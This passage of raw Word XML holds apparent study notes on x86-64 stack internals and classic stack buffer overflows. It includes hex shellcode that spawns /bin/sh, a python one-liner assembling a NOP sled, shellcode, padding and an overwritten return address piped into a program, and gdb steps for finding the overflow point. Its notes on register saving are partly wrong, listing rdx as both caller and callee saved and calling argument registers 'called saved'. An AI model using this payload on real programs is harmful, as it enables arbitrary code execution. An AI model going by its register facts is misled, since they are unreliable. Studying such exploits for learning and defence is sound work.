      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If a callee function saves value to registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC794F" w14:textId="6F49BE9A" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>save values of registers onto stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B221A38" w14:textId="68AF04CC" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use registers and load values back into registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57F801" w14:textId="1DC3976C" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>values can also save values on caller function frame to prevent the values from being overwritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394DA41" w14:textId="1EBD3861" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rax is caller saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C289E74" w14:textId="51108642" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rdi, rsi, rdx, rcx, r8, r9 are called saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB76D6" w14:textId="3F8B10C2" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>r10, r11 are caller saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EC12F" w14:textId="5D465199" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rdx, r12, r13, r14 are callee saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB5426E" w14:textId="4BB62E5D" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rbp is also callee saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D7D61" w14:textId="555981AC" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rsp is callee saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D099DE" w14:textId="16E4B260" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Endianess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BDC26" w14:textId="6225331E" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>different architectures represent same hexadecimal number in different ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826E056" w14:textId="1D5B9E95" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>little endian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF8D5F" w14:textId="1DA49DD2" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>value arranged from LSB to MSB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4751D6" w14:textId="35E89180" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>big endian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622B3FE" w14:textId="5BC542EF" w:rsidR="00A73A79" w:rsidRDefault="00A73A79" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>value arranged from MSB to LSB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5AC88" w14:textId="2E61441D" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Overwriting Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647EEAB8" w14:textId="3585C925" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>because memory is allocated in contiguous bytes, variables and buffers allocated next to each other in code are allocated next to each other in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68826974" w14:textId="2F31DEA3" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>may vary with compiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736E710" w14:textId="2422AD88" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>compiler allocates bytes to ensure variables align with stack size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167F73F" w14:textId="1FEDF937" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>though stacks grown downwards, when data is copied/written into the buffer, it is copied from lower to higher addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E70F3" w14:textId="51457615" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>means variables are possible to be overwritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFDCDE" w14:textId="68B01CF2" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>without length checks, excessive data size could lead to overwrite of variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475369E6" w14:textId="3FD2933A" w:rsidR="003D2E5D" w:rsidRDefault="003D2E5D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Overwriting Function Pointers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C66F369" w14:textId="2888805D" w:rsidR="003D2E5D" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pointers are used to point to a memory location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B130AD" w14:textId="2C91BA28" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check memory addresses of functions to invoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F5670" w14:textId="5A5BB4BC" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Buffer Overflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B316592" w14:textId="1C50C62B" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>strcpy function copies input from a string to a buffer of specific length without length checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF180B" w14:textId="6090BFA1" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>possible to overflow buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14718F" w14:textId="65423729" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack bottom &gt; return address &gt; saved registers &gt; char buffer[size] . . .buffer[0] &gt; stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AFE88" w14:textId="42B99BAB" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when a function calls another function, it needs to add the return address on the stack so the callee function knows where to transfer control to once it has finished executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595C8A9" w14:textId="4D172A70" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>overflow return address with attacker value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3F491" w14:textId="79DE5B6D" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>control where the function returns and change the flow of execution of a program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62666061" w14:textId="14492CB9" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use shellcode in the form of binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645798A" w14:textId="6C5130F7" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002F39E4">
        <w:t>\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D05418" w14:textId="1DA5F5D7" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>point overwritten return address to shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D50251" w14:textId="2EF04AE4" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>where is shellcode stored and what address is it pointed at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375D3C9" w14:textId="3649A9FA" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>store in the buffer because the address at the beginning of the buffer is known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430AAC25" w14:textId="635BE754" w:rsidR="002F39E4" w:rsidRDefault="002F39E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>overwrite return address to point to the start of the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C009D" w14:textId="3FAD554A" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Find out the address of the start of the buffer and the start address of the return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2E3B2" w14:textId="2844B652" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Calculate the difference between these addresses so you know how much data to enter to overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C66A7D" w14:textId="77ADBEC3" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C3899" w14:textId="43CBEBE2" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stack bottom &gt; address of buffer (overwritten old return address) &gt; random data (overwritten saved registers) &gt; random data (inside buffer) &gt; shellcode (inside buffer) &gt; stack top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01250E7A" w14:textId="547FEEF9" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>because memory addresses will vary from program to program, system to system, flexibility is necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFFB713" w14:textId="698C5337" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NOP instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761450A" w14:textId="3AC0E141" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no operation instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E5FC5" w14:textId="400ADD1B" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when processed, system does nothing and carries on execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD133D0" w14:textId="6CC2A306" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>represented as \x90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F50E1A" w14:textId="41134D54" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>means attacker can jump anywhere in memory region that includes an NOP and eventually reach intended instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A6815" w14:textId="7805907A" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NOP Sled &gt; Shell code &gt; Memory Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08848FC2" w14:textId="50C8F067" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F80C1D">
        <w:t>python -c “print (NOP * no_of_nops + shellcode + random_data * no_of_random_data + memory address)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30E36C" w14:textId="35A2FD43" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python -c “print(‘\x90’ * 30 + ‘\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05’ +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FC1CC" w14:textId="6539A360" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">‘\x41’ * 60 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972CD64" w14:textId="3E69A5F2" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘\xef\xbe\xad\xde’) | ./program_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB8BB0" w14:textId="48DAC60F" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED1BAC" w14:textId="6C9E1C0D" w:rsidR="00F80C1D" w:rsidRDefault="00F80C1D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sometimes need to pass xargs before ./program_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7102B" w14:textId="7E8542BC" w:rsidR="00F80C1D" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gdb -q &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E2F91" w14:textId="63E5988E" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run $(python -c “print(‘A’*158)”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A5886" w14:textId="436A80B0" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test to detect overflow limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7B760" w14:textId="4B8CB9A2" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA4DAC" w14:textId="66A1D7EE" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shellcode + return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5B660" w14:textId="607FA122" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
